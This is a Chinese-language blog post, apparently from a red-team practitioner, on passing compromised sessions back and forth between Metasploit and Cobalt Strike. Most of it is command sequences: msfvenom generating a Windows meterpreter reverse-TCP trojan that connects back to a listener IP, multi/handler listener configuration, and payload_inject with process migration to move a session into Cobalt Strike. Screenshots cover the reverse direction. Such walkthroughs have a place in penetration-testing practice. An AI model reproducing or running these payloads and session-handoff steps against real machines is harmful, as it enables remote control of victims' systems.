前言
我们在利用msf获取权限后有时候需要利用cobaltstrike的方便功能
在利用cobaltstrike获取到权限后有时候需要利用msf的payload
这时候就需要cobaltstrike和msf相互联动
msf会话->cobaltstrike会话
msf生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.30.131 lport=6666 -f exe > msftest.exe
msf监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.30.131
set lport 6666
run
控制靶机
然后把生成的msftest.exe上传到靶机执行,接收到会话
cobaltstrike
启动cobaltstrike,并新建一个监听(或者利用原先有的监听也可以)
##msf会话迁移到cobaltstrike
background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.30.131
set lport 1111
set DisablePayloadHandler True
set PrependMigrate True
sessions -i
set session 1
run
在cobaltstrike中上线
![](/i/l/?n=23&i=blog/3254245/202312/3254245-20231224223618199-1134553103.png)
#cobaltstrike会话->msf会话
##启动cobaltstrike并进行监听生成木马
![](/i/l/?n=23&i=blog/3254245/202312/3254245-20231224224008432-1501477976.png)
上线
![](/i/l/?n=23&i=blog/3254245/202312/3254245-20231224224111920-1077917006.png)
##cobaltstrike再添加一个监听器
![](/i/l/?n=23&i=blog/3254245/202312/3254245-20231224224219800-1260361079.png)
##msf监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lport 6667
set lhost 0.0.0.0
run
##cobaltstrike会话迁移到msf
点击这个spawn
![](/i/l/?n=23&i=blog/3254245/202312/3254245-20231224224435936-843360071.png)
![](/i/l/?n=23&i=blog/3254245/202312/3254245-20231224224455519-411615153.png)
一段时间后接受到会话
![](/i/l/?n=23&i=blog/3254245/202312/3254245-20231224224623977-748145157.png)
标签:12,3254245,blog,set,cobaltstrike,msf,红队,com
From: https://www.cnblogs.com/thebeastofwar/p/17924828.html